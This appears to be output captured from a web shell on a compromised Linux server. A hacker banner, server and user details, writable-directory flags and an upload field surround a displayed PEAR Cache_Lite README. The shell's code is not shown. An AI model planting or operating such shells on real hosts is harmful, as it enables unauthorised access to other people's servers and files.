Heray-Was-Here
Server : Apache
System : Linux infong-uk56 4.4.400-icpu-108 #2 SMP Wed Feb 11 11:51:01 UTC 2026 x86_64
User : u78863098 ( 10368940)
PHP Version : 8.4.24
Disable Function : NONE
Directory :  /usr/lib/php8.4/doc/Cache_Lite/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/lib/php8.4/doc/Cache_Lite/README.md
# PEAR Cache_Lite

Fast and safe little cache system.

This package is a little cache system optimized for file containers.
t is fast and safe (because it uses file locking and/or anti-corruption tests).

[![Build Status](https://travis-ci.org/pear/Cache_Lite.svg)](https://travis-ci.org/pear/Cache_Lite)


## Building
To test this package, run

    phpunit tests/

To build, simply execute

    pear package


## Installation
### PEAR
To install from scratch

    pear install package.xml

To upgrade

    pear upgrade -f package.xml

### Composer

    composer require pear/cache_lite


## Links
- Homepage: http://pear.php.net/package/Cache_Lite
- Source code: https://github.com/pear/Cache_Lite
- Issue tracker: http://pear.php.net/bugs/search.php?cmd=display&package_name[]=Cache_Lite
- Unit test status: https://travis-ci.org/pear/Cache_Lite
- Packagist: https://packagist.org/packages/pear/cache_lite

Hry